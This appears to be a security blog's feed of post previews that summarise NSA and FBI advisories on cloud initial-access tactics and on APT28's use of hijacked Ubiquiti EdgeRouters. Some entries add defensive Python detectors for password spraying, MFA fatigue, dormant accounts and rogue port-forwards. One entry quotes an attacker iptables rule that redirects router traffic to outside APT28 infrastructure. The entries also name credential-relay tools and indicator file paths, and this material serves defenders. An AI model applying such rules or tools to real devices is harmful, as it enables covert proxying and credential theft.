• 04 Sep 2024
    2 minutes

    The document titled “cyber actors adapt tactics for initial cloud access”, released by the National Security Agency (NSA), warns that cyber actors have adapted their tactics to gain initial access to cloud services rather than exploiting on-premises network vulnerabilities.

    Benefits:

    📌Awareness and Understanding: The document raises awareness about the shift in tactics towards cloud services, which is crucial for organizations to understand the current threat landscape.

    📌Detailed TTPs: It provides detailed information on the tactics, techniques, and procedures (TTPs) used by actors, including the use of service and dormant accounts, which can help organizations identify potential threats and vulnerabilities.

    📌Sector-Specific Insights: The document outlines the expansion of targeting to sectors such as aviation, education, law enforcement, and military organizations, offering sector-specific insights that can help these industries bolster their defenses.

    📌Mitigation Strategies: It offers practical mitigation strategies that organizations can implement to strengthen their defenses against initial access by actors, such as implementing MFA and managing system accounts.

    📌Emphasis on Fundamentals: The advisory emphasizes the importance of cybersecurity fundamentals, which can help organizations establish a strong baseline defense against sophisticated actors.

    📌Global Supply Chain Relevance: The document references the actors’ involvement in the SolarWinds supply chain compromise, highlighting the global implications of such cyber espionage activities.

    Free
  • 03 Sep 2024
    8 minutes

    Defense through Cybersecurity Fundamentals in the APT

    In the contemporary cybersecurity landscape, marked by the sophisticated operations of actors, the importance of adhering to cybersecurity fundamentals cannot be overstated. While advanced threats continue to evolve, leveraging cutting-edge tactics, techniques, and procedures (TTPs), a strong foundation in cybersecurity fundamentals remains a critical line of defense for organizations across all sectors. This foundational approach to cybersecurity emphasizes the implementation of best practices, policies, and controls that are designed to protect against a wide range of threats, including those from highly sophisticated adversaries.

    Understanding Cybersecurity Fundamentals

    📌Access Control: Ensuring that only authorized users have access to information systems and data, and that they are only able to perform actions that are necessary for their role.

    📌Data Encryption: Protecting data at rest and in transit through encryption, making it unreadable to unauthorized users.

    📌Patch Management: Regularly updating software and systems to address vulnerabilities and reduce the risk of exploitation.

    📌Firewalls and Intrusion Detection Systems (IDS): Implementing firewalls to block unauthorized access and IDS to monitor network traffic for suspicious activity.

    📌Multi-Factor Authentication (MFA): Requiring users to provide two or more verification factors to gain access to systems, significantly enhancing security.

    Free
  • 02 Sep 2024
    3 minutes

    According to the document “cyber actors adapt tactics for initial cloud access”, the actors have demonstrated a high level of sophistication in their cyber operations, reflecting a deep understanding of the global cyber landscape and an ability to adapt and innovate in the face of evolving security measures. This sophistication is evident not only in their technical capabilities but also in their strategic approach to cyber espionage, which involves careful target selection, meticulous planning, and the use of advanced tactics, techniques, and procedures (TTPs).

    Technical Prowess and Innovation

    Their cyber operations are characterized by the use of custom malware and zero-day vulnerabilities—previously unknown software vulnerabilities that have not been disclosed to the software maker or the public. Exploiting these vulnerabilities allows them to infiltrate target networks undetected. An example of this is the SolarWinds supply chain attack, where the actors are believed to have compromised the software development process to insert malicious code into a software update, affecting thousands of SolarWinds' clients, including government agencies and Fortune 500 companies.

    Operational Security and Stealth

    Operational security (OpSec) is a hallmark of these operations, with the agency going to great lengths to cover its tracks and maintain stealth within compromised networks. This includes the use of encrypted channels for exfiltrating data, careful management of command-and-control servers to avoid detection, and the use of legitimate tools and services (a technique known as "living off the land") to blend in with normal network activity. The ability to maintain a low profile within target networks often allows them to conduct long-term espionage operations without detection.

    Psychological and Social Engineering Tactics

    Beyond technical capabilities, the actors have shown adeptness in psychological and social engineering tactics. These methods are designed to manipulate individuals into divulging sensitive information or performing actions that compromise security. Phishing campaigns, spear-phishing, and other forms of social engineering are frequently used to gain initial access to target networks or to escalate privileges once inside.

    Target Selection and Intelligence Gathering

    Free
  • 01 Sep 2024
    3 minutes

    The exploitation of service and dormant accounts by cyber actors represents a sophisticated and often overlooked vector of cyber-attacks. These accounts, which are created for various operational purposes within an organization's cloud and on-premises environments, can provide attackers with the access they need to carry out their objectives if not properly managed and secured.

    Understanding Service and Dormant Accounts

    Service accounts are specialized accounts used by applications or services to interact with the operating system or other services. They often have elevated privileges to perform specific tasks and may not be tied to an individual user's identity. Dormant accounts, on the other hand, are user accounts that are no longer actively used, either because the user has left the organization or the account's purpose has been fulfilled. These accounts are particularly risky because they are frequently forgotten, left with more privileges than necessary, and not monitored as closely as active user accounts.

    Why Service and Dormant Accounts Are Targeted

    📌Elevated Privileges: Service accounts often have elevated privileges necessary for system tasks, which can be exploited to gain wide access to an organization's network.

    📌Lack of Monitoring: Dormant accounts are not regularly used, making them less likely to be monitored for suspicious activity, and thus an attractive target for attackers.

    📌Weak or Default Credentials: Service accounts may be configured with weak or default credentials that are easier for attackers to guess or find through brute force attacks.

    📌Bypassing User Behavior Analytics: Since service accounts perform automated tasks, their behavior patterns can be predictable, allowing malicious activities to blend in with normal operations and evade detection.

    Free
  • 31 Aug 2024
    3 minutes

    The strategic expansion of targeting by cyber actors to a broader range of sectors is a concerning development in the realm of global cybersecurity. This diversification of targets reflects a calculated approach by these actors to exploit the interconnected nature of modern industries and the increasing reliance on cloud services across various sectors.

    Broadening the Scope of Espionage

    The expansion into sectors such as aviation, education, law enforcement, local and state councils, government financial departments, and military organizations demonstrates their intent to gather intelligence from a wide spectrum of sources. This broad targeting strategy suggests that the actors are not only interested in traditional national security-related information but also in acquiring a diverse set of data that could provide economic, political, or technological advantages.

    Implications for Different Sectors

    📌Aviation: The aviation industry involves a complex ecosystem of airlines, airports, manufacturers, and support services, all of which handle sensitive data related to national security, safety, and proprietary technology.

    📌Education: Universities and research institutions are rich sources of cutting-edge research and intellectual property. They are often targeted for their groundbreaking work in science, technology, and defense-related areas.

    📌Law Enforcement: Law enforcement agencies hold sensitive data on criminal investigations, national security matters, and personal information of citizens, making them a high-value target for espionage.

    📌Local and State Councils: Local and state government entities manage critical infrastructure, citizen services, and have access to vast amounts of personal data, which can be exploited for various malicious purposes.

    Free
  • 30 Aug 2024
    3 minutes

    The shift in focus by cyber actors to cloud services has brought the importance of securing initial access to the forefront of cybersecurity efforts. In cloud environments, initial access represents the critical juncture at which the security of the entire system is most vulnerable. Unlike traditional on-premises networks, where multiple layers of security can be deployed, cloud services are accessed over the internet, making the initial point of entry a prime target for attackers.

    Initial Access as a Foothold for Attackers

    Gaining initial access to cloud services allows attackers to establish a foothold within the target environment. From this position, they can potentially escalate privileges, move laterally across the network, and access sensitive data. The distributed nature of cloud services also means that compromising a single account can have far-reaching consequences, potentially giving attackers access to a wide array of resources and data.

    Challenges in Securing Initial Access

    📌Remote Access: Cloud services are designed to be accessed remotely, which inherently increases the attack surface. Remote access points must be secured against unauthorized entry while still providing legitimate users with the necessary access.

    📌Identity and Access Management (IAM): In cloud environments, IAM becomes a critical component of security. Organizations must ensure that IAM policies are robust and that permissions are granted based on the principle of least privilege to minimize the risk of initial access by unauthorized entities.

    📌Phishing and Social Engineering: Attackers often use phishing and social engineering tactics to gain initial access. These methods exploit human factors rather than technical vulnerabilities, making them difficult to defend against with traditional security measures.

    Examples of Initial Access Techniques

    Free
  • 29 Aug 2024
    3 minutes

    Authentication as a Key Step in Cloud Security

    In the evolving landscape of cybersecurity, the adaptation of cyber actors to target cloud services underscores a pivotal shift in the tactics of cyber espionage. This transition from exploiting on-premises network vulnerabilities to directly targeting cloud-based infrastructures marks a significant evolution in cyber threats. At the heart of this shift is the critical role of authentication as a key step in securing cloud-hosted networks against sophisticated cyber actors.

    The Importance of Authentication in Cloud Environments

    Authentication serves as the gateway to cloud services, determining whether access should be granted to a user or system. In cloud environments, where resources and data are hosted off-premises and accessed over the internet, the importance of robust authentication mechanisms cannot be overstated. Unlike traditional on-premises setups, where physical security measures and internal network defenses can provide layers of security, cloud services are inherently more exposed to the internet. This exposure makes the initial step of authentication not just a security measure, but a critical defense mechanism against unauthorized access.

    Challenges in Cloud Authentication

    The shift towards cloud services brings with it unique challenges in implementing effective authentication strategies. One of the primary challenges is the diverse and dynamic nature of cloud environments. Users access cloud services from various locations, devices, and networks, necessitating flexible yet secure authentication mechanisms that can adapt to different contexts without compromising security.

    Moreover, the scalability of cloud services means that authentication mechanisms must be able to handle a large number of access requests without introducing significant latency or reducing the user experience. This requirement for scalability and user-friendliness often conflicts with the need for stringent security measures, creating a delicate balance that organizations must navigate.

    Strategies for Strengthening Cloud Authentication

    Free
  • 28 Aug 2024
    8 minutes

    Key TTPs from the document “cyber actors adapt tactics for initial cloud access”

    📌Credential Access / T1110 Brute Forcing: Actors utilize password spraying and brute forcing as initial infection vectors. This approach involves attempting a few passwords against many different accounts (password spraying) or numerous password attempts on a single account (brute forcing) to gain unauthorized access.

    📌Initial Access / T1078.004 Valid Accounts: Cloud Accounts: The actors gain access to cloud services by using compromised credentials. This includes targeting both system accounts (used for automated tasks and services) and dormant accounts (inactive accounts that still remain on the system).

    📌Credential Access / T1528 Steal Application Access Token: Actors exploit stolen access tokens to log into accounts without needing the passwords. Access tokens are digital keys that allow access to user accounts, and obtaining these can bypass traditional login mechanisms.

    📌Credential Access / T1621 Multi-Factor Authentication Request Generation: Known as 'MFA bombing' or 'MFA fatigue,' this technique involves actors repeatedly sending MFA requests to a victim's device. The goal is to overwhelm or fatigue the victim into accepting the request, thus granting the attacker access.

    📌Command and Control / T1090.002 Proxy: External Proxy: To maintain covert operations and blend in with normal traffic, actors use open proxies located in residential IP ranges. This makes malicious connections harder to distinguish from legitimate user activity in access logs.

    📌Persistence / T1098.005 Account Manipulation: Device Registration: After gaining access to accounts, actors attempt to register their own devices on the cloud tenant. Successful device registration can provide persistent access to the cloud environment.
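As an added example, not taken from the advisory or from this post, the Python below runs defender-side detection logic for three of the TTPs listed above (password spraying under T1110, MFA fatigue under T1621, and a sign-in to a dormant account under T1078.004, which is also the risk described in the earlier post on service and dormant accounts) over a constructed JSON-lines sign-in log. The log field names, the thresholds, and the LAST_SUCCESS inventory are assumptions made for the example.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed JSON-lines sign-in log (not real data). The field names are an
# assumption modelled on typical cloud identity-provider exports: timestamp,
# account, source IP, outcome, and the MFA action if any.
SAMPLE_LOG = "\n".join([
    # Benign: one mistyped password, then a normal MFA-backed sign-in.
    '{"ts":"2024-08-28T08:15:00Z","user":"c.lee","ip":"192.0.2.10","result":"failure","mfa":null}',
    '{"ts":"2024-08-28T08:15:20Z","user":"c.lee","ip":"192.0.2.10","result":"success","mfa":"prompt_approved"}',
    # Password spray (T1110): one source IP, one rejected guess per account.
    '{"ts":"2024-08-28T09:00:01Z","user":"a.ivanov","ip":"203.0.113.7","result":"failure","mfa":null}',
    '{"ts":"2024-08-28T09:00:09Z","user":"b.smith","ip":"203.0.113.7","result":"failure","mfa":null}',
    '{"ts":"2024-08-28T09:00:17Z","user":"c.lee","ip":"203.0.113.7","result":"failure","mfa":null}',
    '{"ts":"2024-08-28T09:00:25Z","user":"d.khan","ip":"203.0.113.7","result":"failure","mfa":null}',
    '{"ts":"2024-08-28T09:00:33Z","user":"svc-backup","ip":"203.0.113.7","result":"failure","mfa":null}',
    '{"ts":"2024-08-28T09:00:41Z","user":"e.garcia","ip":"203.0.113.7","result":"failure","mfa":null}',
    # MFA fatigue (T1621): a burst of prompts to one user, finally approved.
    '{"ts":"2024-08-28T11:30:00Z","user":"b.smith","ip":"198.51.100.22","result":"failure","mfa":"prompt_sent"}',
    '{"ts":"2024-08-28T11:30:30Z","user":"b.smith","ip":"198.51.100.22","result":"failure","mfa":"prompt_sent"}',
    '{"ts":"2024-08-28T11:31:00Z","user":"b.smith","ip":"198.51.100.22","result":"failure","mfa":"prompt_sent"}',
    '{"ts":"2024-08-28T11:31:30Z","user":"b.smith","ip":"198.51.100.22","result":"failure","mfa":"prompt_sent"}',
    '{"ts":"2024-08-28T11:32:10Z","user":"b.smith","ip":"198.51.100.22","result":"success","mfa":"prompt_approved"}',
    # Dormant account (T1078.004): first successful sign-in in months.
    '{"ts":"2024-08-28T13:05:00Z","user":"j.doe-contractor","ip":"198.51.100.40","result":"success","mfa":"prompt_approved"}',
])

# Constructed inventory: each account's last successful sign-in date before
# this log window (assumed to be exported from the identity provider).
LAST_SUCCESS = {
    "a.ivanov": "2024-08-27", "b.smith": "2024-08-27", "c.lee": "2024-08-26",
    "d.khan": "2024-08-27", "e.garcia": "2024-08-27", "svc-backup": "2024-08-27",
    "j.doe-contractor": "2024-03-01",  # idle for months: a dormant account
}

def parse_log(text):
    """Parse JSON lines into dicts with a datetime timestamp, oldest first."""
    events = []
    for line in text.splitlines():
        if line.strip():
            rec = json.loads(line)
            rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
            events.append(rec)
    return sorted(events, key=lambda e: e["ts"])

def detect_password_spray(events, window=timedelta(minutes=10), min_accounts=5):
    """Flag a source IP whose rejected passwords (no MFA prompt reached) hit
    many distinct accounts with few tries each inside one window."""
    findings, by_ip = [], defaultdict(list)
    for e in events:
        if e["result"] == "failure" and e["mfa"] is None:
            by_ip[e["ip"]].append(e)
    for ip, fails in by_ip.items():
        for i, first in enumerate(fails):
            burst = [f for f in fails[i:] if f["ts"] - first["ts"] <= window]
            users = {f["user"] for f in burst}
            if len(users) >= min_accounts and len(burst) <= 2 * len(users):
                findings.append({"ip": ip, "accounts": sorted(users), "start": first["ts"]})
                break  # one finding per IP is enough for the analyst
    return findings

def detect_mfa_fatigue(events, window=timedelta(minutes=5), min_prompts=4):
    """Flag a user who receives a burst of MFA prompts in a short window and
    record whether one of them was approved (the case that needs response)."""
    findings, by_user = [], defaultdict(list)
    for e in events:
        if e["mfa"] is not None:
            by_user[e["user"]].append(e)
    for user, prompts in by_user.items():
        for i, first in enumerate(prompts):
            burst = [p for p in prompts[i:] if p["ts"] - first["ts"] <= window]
            if len(burst) >= min_prompts:
                findings.append({"user": user, "prompts": len(burst), "start": first["ts"],
                                 "approved": any(p["mfa"] == "prompt_approved" for p in burst)})
                break
    return findings

def detect_dormant_reactivation(events, last_success, dormant_days=90):
    """Flag a successful sign-in to an account whose previous success is older
    than dormant_days; such accounts are rarely watched, as the post notes."""
    findings = []
    for e in events:
        prev = last_success.get(e["user"]) if e["result"] == "success" else None
        if prev is None:
            continue
        idle = e["ts"] - datetime.strptime(prev, "%Y-%m-%d")
        if idle > timedelta(days=dormant_days):
            findings.append({"user": e["user"], "ip": e["ip"], "idle_days": idle.days})
    return findings

def analyse(log_text, last_success):
    """Run all three detections and return findings keyed by technique."""
    events = parse_log(log_text)
    return {"password_spray": detect_password_spray(events),
            "mfa_fatigue": detect_mfa_fatigue(events),
            "dormant_reactivation": detect_dormant_reactivation(events, last_success)}

if __name__ == "__main__":
    for kind, items in analyse(SAMPLE_LOG, LAST_SUCCESS).items():
        for item in items:
            print(kind, item)
```

The thresholds are deliberately conservative starting points; tune the windows and counts against your own tenant's baseline so that a help-desk password reset or a user re-trying MFA does not page anyone.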

    Access via Service and Dormant Accounts

    Free
  • 27 Aug 2024
    2 minutes

    The adaptation of attacks to target cloud services marks a significant evolution in the landscape of cyber espionage and cyber warfare. This shift is not merely a change in target but represents a deeper strategic adaptation to the changing technological environment and the increasing reliance of governments and corporations on cloud infrastructure. The move towards cloud services by organizations is driven by the benefits of scalability, cost-efficiency, and the ability to rapidly deploy and update services. However, this transition also presents new vulnerabilities and challenges for cybersecurity.

    Strategic Shift to Cloud

    As organizations have modernized their systems and migrated to cloud-based infrastructure, actors have adapted their tactics, techniques, and procedures (TTPs) to this new environment. This adaptation is driven by the realization that cloud services, by centralizing vast amounts of data and resources, present a lucrative target for espionage and intelligence gathering. The cloud's architecture, while offering numerous advantages to organizations, also necessitates a reevaluation of security strategies to address unique vulnerabilities.

    Tactics, Techniques, and Procedures (TTPs)

    The adaptation of actors to cloud services involves a range of sophisticated TTPs designed to exploit the specific characteristics of cloud environments. One of the primary methods of gaining initial access to cloud-hosted networks involves authenticating to the cloud provider. This can be achieved through various means, including brute forcing and password spraying to access services and dormant accounts. These accounts, often used to run and manage applications without direct human oversight, are particularly vulnerable as they may not be protected by multi-factor authentication (MFA) and may possess high levels of privilege.

    Furthermore, actors have been observed using system-issued tokens for authentication, bypassing the need for passwords. They have also exploited the process of enrolling new devices to the cloud, bypassing MFA through techniques such as "MFA bombing" or "MFA fatigue." Additionally, the use of residential proxies to obscure their internet presence and make malicious activity harder to detect represents another layer of sophistication in their operations.

    Implications and Mitigations

    The adaptation of actors to target cloud services has significant implications for cybersecurity. It underscores the need for organizations to implement robust security measures tailored to the cloud environment. This includes enforcing strong password policies, implementing MFA, managing and monitoring service and dormant accounts, and configuring device enrollment policies to prevent unauthorized access. Additionally, adjusting the validity time of system-issued tokens and employing network-level defenses to detect and mitigate the use of residential proxies are critical steps in defending against these threats.
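    The mitigations above (monitoring service and dormant accounts, enforcing MFA, watching for password spraying) translate directly into sign-in log checks. The following is an added example, not part of the original post or the NSA advisory: it runs three such checks over a constructed, provider-neutral sign-in log. The record shape, the account names, the `LAST_KNOWN_SUCCESS` baseline and the thresholds (a 10-minute window, four accounts, 90 dormant days) are all assumptions chosen for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, provider-neutral sign-in events (not real log data).
# Each record: (UTC timestamp, account, source IP, result, MFA satisfied).
SIGNIN_LOG = [
    ("2024-08-27T02:00:01Z", "svc-backup", "203.0.113.7", "failure", False),
    ("2024-08-27T02:00:05Z", "svc-ci", "203.0.113.7", "failure", False),
    ("2024-08-27T02:00:09Z", "j.doe", "203.0.113.7", "failure", False),
    ("2024-08-27T02:00:14Z", "a.smith", "203.0.113.7", "failure", False),
    ("2024-08-27T02:00:18Z", "svc-legacy", "203.0.113.7", "success", False),
    ("2024-08-27T09:15:00Z", "j.doe", "198.51.100.4", "success", True),
]

# Constructed baseline: last successful sign-in per account before this log window.
LAST_KNOWN_SUCCESS = {
    "svc-legacy": "2024-02-01T00:00:00Z",  # untouched for months: a dormant account
    "j.doe": "2024-08-26T17:30:00Z",
}
NOW = "2024-08-27T12:00:00Z"


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def detect_password_spray(events, window_minutes=10, min_accounts=4):
    """Return {source_ip: [accounts]} for IPs that fail against many distinct
    accounts inside a short window (few attempts per account, many accounts)."""
    failures = defaultdict(list)
    for ts, user, ip, result, _mfa in events:
        if result == "failure":
            failures[ip].append((parse_ts(ts), user))
    window = timedelta(minutes=window_minutes)
    flagged = {}
    for ip, attempts in failures.items():
        attempts.sort()
        for i, (start, _user) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - start <= window}
            if len(users) >= min_accounts:
                flagged[ip] = sorted(users)
                break
    return flagged


def find_dormant_account_logins(events, last_known_success, now, dormant_days=90):
    """Successful sign-ins to accounts with no prior success within dormant_days
    (or with no success on record at all)."""
    cutoff = parse_ts(now) - timedelta(days=dormant_days)
    hits = []
    for ts, user, ip, result, _mfa in events:
        if result != "success":
            continue
        last = last_known_success.get(user)
        if last is None or parse_ts(last) < cutoff:
            hits.append((user, ip, ts))
    return hits


def find_success_without_mfa(events):
    """Accounts that authenticated successfully without satisfying MFA."""
    return sorted({user for _ts, user, _ip, result, mfa in events
                   if result == "success" and not mfa})


if __name__ == "__main__":
    print("spray:", detect_password_spray(SIGNIN_LOG))
    print("dormant:", find_dormant_account_logins(SIGNIN_LOG, LAST_KNOWN_SUCCESS, NOW))
    print("no MFA:", find_success_without_mfa(SIGNIN_LOG))
```

    In the constructed log, one source address fails against four accounts in under a minute and then succeeds against a service account that has not signed in for months and has no MFA claim, which is exactly the service-and-dormant-account pattern the advisory describes. The baseline of last successful sign-ins is the part that needs real data; without it, every success on an unlisted account is treated as dormant.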

    Free
  • 26 Aug 2024
    2 minutes

    The document titled “cyber actors adapt tactics for initial cloud access” released by the National Security Agency (NSA) warns that cyber actors have adapted their tactics to gain initial access to cloud services, as opposed to exploiting on-premise network vulnerabilities.

    This shift is in response to organizations modernizing their systems and moving to cloud-based infrastructure. The high-profile cyber campaigns like the SolarWinds supply chain compromise are now expanding to sectors such as aviation, education, law enforcement, local and state councils, government financial departments, and military organizations.

    The stark reality is that to breach cloud-hosted networks, these actors need only to authenticate with the cloud provider, and if they succeed, the defenses are breached. The document highlights a particularly disconcerting aspect of cloud environments: the reduced network exposure compared to on-premises systems paradoxically makes initial access a more significant linchpin.

    Over the past year, the TTPs observed have been alarmingly simple yet effective, with the cyber actors exploiting service and dormant accounts through brute force attacks. The document offers cold comfort: it implies a race against time for organizations to fortify their defenses against these TTPs and prevent initial access.

    Key points

    📌Adaptation to Cloud Services: Cyber actors have shifted their focus from exploiting on-premises network vulnerabilities to directly targeting cloud services. This change is a response to the modernization of systems and the migration of organizational infrastructure to the cloud.

    📌Authentication as a Key Step: To compromise cloud-hosted networks, cyber actors must first successfully authenticate with the cloud provider. Preventing this initial access is crucial for stopping them from compromising the target.

    📌Expansion of Targeting: Cyber actors have broadened their targeting to include sectors such as aviation, education, law enforcement, local and state councils, government financial departments, and military organizations. This expansion indicates a strategic diversification of targets for intelligence gathering.

    Free
  • 25 Aug 2024
    2 minutes

    In December 2023, APT28 actors developed MASEPIE, a small Python backdoor capable of executing arbitrary commands on victim machines. An FBI investigation revealed that on more than one occasion, APT28 used compromised Ubiquiti EdgeRouters as command-and-control (C2) infrastructure for MASEPIE backdoors deployed against targets.

    Command-and-Control Infrastructure

    While APT28 does not deploy MASEPIE on EdgeRouters themselves, the compromised routers have been used as C2 infrastructure to communicate with and control MASEPIE backdoors installed on systems belonging to targeted individuals and organizations.

    The data sent to and from the EdgeRouters acting as C2 servers was encrypted using a randomly generated 16-character AES key, making it more difficult to detect and analyze the malicious traffic.

    MASEPIE Backdoor Functionality

    MASEPIE is a Python-based backdoor that allows APT28 actors to execute arbitrary commands on the infected systems. This backdoor provides the threat actors with a persistent foothold and remote control capabilities, enabling them to carry out various malicious activities, such as:

    📌 Data exfiltration

    📌 Lateral movement within the compromised network

    Free
  • 24 Aug 2024
    1 minute

    APT28 actors have been using compromised Ubiquiti EdgeRouters to establish proxy connections and reverse SSH tunnels to their dedicated infrastructure. This allows them to maintain persistent access and control over the compromised devices, even after password changes or other mitigation attempts.

    Reverse Proxy Connections

    APT28 actors have utilized iptables rules on EdgeRouters to establish reverse proxy connections to their dedicated infrastructure. Network defenders and users can review iptables chains and Bash histories on EdgeRouters for unusual invocations, such as the following example:

    iptables -t nat -I PREROUTING -d <router IP address> -p tcp -m tcp --dport 4443 -j DNAT --to-destination <APT28 dedicated infrastructure>:10081

    This iptables rule redirects incoming traffic on port 4443 of the EdgeRouter to the APT28 dedicated infrastructure on port 10081, effectively creating a reverse proxy connection.
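    A defender reviewing a router does not have to eyeball every chain by hand: the pattern above (a nat-table DNAT whose destination is an outside host rather than a machine behind the router) can be picked out of `iptables-save` output mechanically. The following is an added example, not from the advisory or from Ubiquiti: it parses a constructed `iptables-save` excerpt and flags DNAT rules that forward to a non-local address. The addresses are RFC 5737 documentation ranges standing in for the router's WAN address and an external host, not real indicators, and the `LOCAL_NETS` list is an assumption that a port-forward on such a router should land on an RFC 1918 host.

```python
import ipaddress
import re

# Constructed iptables-save excerpt modelled on the rule shape above. Addresses are
# RFC 5737 documentation ranges (192.0.2.0/24, 198.51.100.0/24), not real indicators.
IPTABLES_SAVE = """\
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -d 192.0.2.10/32 -p tcp -m tcp --dport 4443 -j DNAT --to-destination 198.51.100.23:10081
-A PREROUTING -d 192.0.2.10/32 -p tcp -m tcp --dport 8080 -j DNAT --to-destination 192.168.1.10:80
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
"""

# Assumption: on a home/office router a port-forward destination should be a host
# behind the router. Anything else bounces inbound connections to an outside host.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

DNAT_RE = re.compile(
    r"^-A (?P<chain>\S+) (?P<match>.*?) -j DNAT --to-destination "
    r"(?P<dest>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<dest_port>\d+))?\s*$")
DPORT_RE = re.compile(r"--dport (\d+)")


def parse_dnat_rules(text):
    """Extract DNAT rules from the nat table of iptables-save output."""
    rules, table = [], None
    for line in text.splitlines():
        if line.startswith("*"):          # table header, e.g. "*nat"
            table = line[1:].strip()
            continue
        if table != "nat":
            continue
        m = DNAT_RE.match(line)
        if not m:
            continue
        dport = DPORT_RE.search(m.group("match"))
        rules.append({
            "chain": m.group("chain"),
            "dport": int(dport.group(1)) if dport else None,
            "dest": m.group("dest"),
            "dest_port": int(m.group("dest_port")) if m.group("dest_port") else None,
            "raw": line,
        })
    return rules


def is_local(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in LOCAL_NETS)


def flag_external_forwards(rules):
    """DNAT rules whose destination is not on a local network: the reverse-proxy pattern."""
    return [r for r in rules if not is_local(r["dest"])]


if __name__ == "__main__":
    for r in flag_external_forwards(parse_dnat_rules(IPTABLES_SAVE)):
        print(f"suspicious {r['chain']} dport {r['dport']} -> {r['dest']}:{r['dest_port']}")
```

    Of the two port-forwards in the constructed excerpt, only the one sending port 4443 to an outside host is flagged; the forward to 192.168.1.10 is an ordinary internal port-forward. On a real device, feed the script the output of `iptables-save` and treat any hit as something to explain, alongside the Bash-history review the advisory recommends.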

    Reverse SSH Tunnels

    Additionally, APT28 actors have uploaded adversary-controlled SSH RSA keys to compromised EdgeRouters to establish reverse SSH tunnels. These tunnels allow the actors to access the compromised devices, even after password changes or other mitigation attempts.

    Network defenders and users can review the following directories on EdgeRouters for unknown RSA keys:

    Free
  • 23 Aug 2024
    2 minutes

    APT28 actors have been exploiting CVE-2023-23397, a critical elevation of privilege vulnerability in Microsoft Outlook on Windows, to facilitate NTLMv2 credential leaks. This vulnerability, which was a zero-day at the time of its initial exploitation by APT28 in early 2022, allows Net-NTLMv2 hashes to be leaked to actor-controlled infrastructure.

    NTLMv2 Credential Harvesting

    To exploit CVE-2023-23397 and harvest NTLMv2 credentials, APT28 actors have been using two publicly available tools:

    📌 ntlmrelayx.py: This tool is part of the Impacket suite, a collection of Python classes for working with network protocols. APT28 actors have used ntlmrelayx.py to execute NTLM relay attacks [T1557] and facilitate the leakage of NTLMv2 credentials.

    📌 Responder: Responder is a tool designed to capture and relay NTLMv2 hashes by setting up a rogue authentication server [T1556]. APT28 actors have installed Responder on compromised Ubiquiti EdgeRouters to collect NTLMv2 credentials from targeted Outlook accounts.

    The FBI has collected evidence of APT28's CVE-2023-23397 exploitation activity on numerous compromised EdgeRouters.

    Logging and Detection

    📌 When using the default configurations, Responder logs its activity to the following files:

    Free
  • 22 Aug 2024
    2 minutes

    APT28 actors have been hosting custom Python scripts on compromised Ubiquiti EdgeRouters to collect and validate stolen webmail account credentials. These scripts are typically stored alongside related log files in the home directory of a compromised user, such as:

    /home/<compromised user>/srv/core.py

    /home/<compromised user>/srv/debug.txt

    The FBI claims that they have recovered verbose log files containing information about APT28 activity on the compromised EdgeRouters.

    Custom Python Scripts

    📌 The custom Python scripts hosted on the compromised EdgeRouters serve the purpose of collecting and validating stolen webmail account credentials. APT28 actors use these scripts as part of their credential harvesting operations, targeting specific webmail users.

    📌 The scripts are designed to automatically break captcha problems on webmail login pages, allowing the actors to bypass this security measure and gain unauthorized access to the targeted accounts. To achieve this, the scripts make connections to the API endpoint api[.]anti-captcha[.]com, which is used by APT28 actors for captcha-solving purposes.

    Free
  • 21 Aug 2024
    2 minutes

    APT28 actors have been leveraging default credentials and trojanized OpenSSH server processes to access Ubiquiti EdgeRouters. The trojanized OpenSSH server processes are associated with Moobot, a Mirai-based botnet that infects Internet of Things (IoT) devices using remotely exploitable vulnerabilities, such as weak or default passwords.

    Trojanized OpenSSH Server Binaries

    📌 Trojanized OpenSSH server binaries downloaded from packinstall[.]kozow[.]com have replaced legitimate binaries on EdgeRouters accessed by APT28. These trojanized binaries allow remote attackers to bypass authentication and gain unauthorized access to the compromised routers.

    📌 The Moobot botnet is known for its ability to exploit vulnerabilities in IoT devices, particularly those with weak or default passwords. By replacing the legitimate OpenSSH server binaries with trojanized versions, APT28 actors can maintain persistent access to the compromised EdgeRouters and use them for various malicious purposes.

    Mirai-based Botnet

    📌 Moobot is a Mirai-based botnet, which means it is derived from the infamous Mirai malware that first emerged in 2016. Mirai is designed to scan for and infect IoT devices by exploiting common vulnerabilities and using default credentials. Once a device is infected, it becomes part of the botnet and can be used for distributed denial-of-service (DDoS) attacks, credential stuffing, and other malicious activities.

    📌 The use of a Mirai-based botnet like Moobot highlights the importance of securing IoT devices, such as routers, by changing default passwords and keeping the firmware up to date. The combination of weak or default passwords and unpatched vulnerabilities makes these devices an attractive target for threat actors like APT28.

    Impact on Compromised EdgeRouters

    Free
  • 20 Aug 2024
    1 hour 13 minutes

    An analysis of the National Security Agency’s (NSA) advisory on combatting cyber threat actors who perpetrate Living Off the Land (LOTL) intrusions, encompassing a thorough examination of the advisory’s multifaceted approach to addressing LOTL tactics, which are increasingly leveraged by adversaries to exploit legitimate tools within a target’s environment for malicious purposes.

    The analysis serves as a valuable resource for security professionals, IT personnel, policymakers, and stakeholders across various industries, providing them with the knowledge to enhance their defensive capabilities against sophisticated LOTL cyber threats. By implementing the advisory’s recommendations, these professionals can improve their situational awareness, refine their security posture, and develop more robust defense mechanisms to protect against the subtle and stealthy nature of LOTL intrusions.

    Free
  • 20 Aug 2024
    2 minutes

    The threat actor's operations have targeted various industries, including Aerospace & Defense, Education, Energy & Utilities, Governments, Hospitality, Manufacturing, Oil & Gas, Retail, Technology, and Transportation. The targeted countries include the Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, United Arab Emirates, and the US, with a strategic focus on individuals in Ukraine.

    Potential consequences and impacts on these affected industries include:

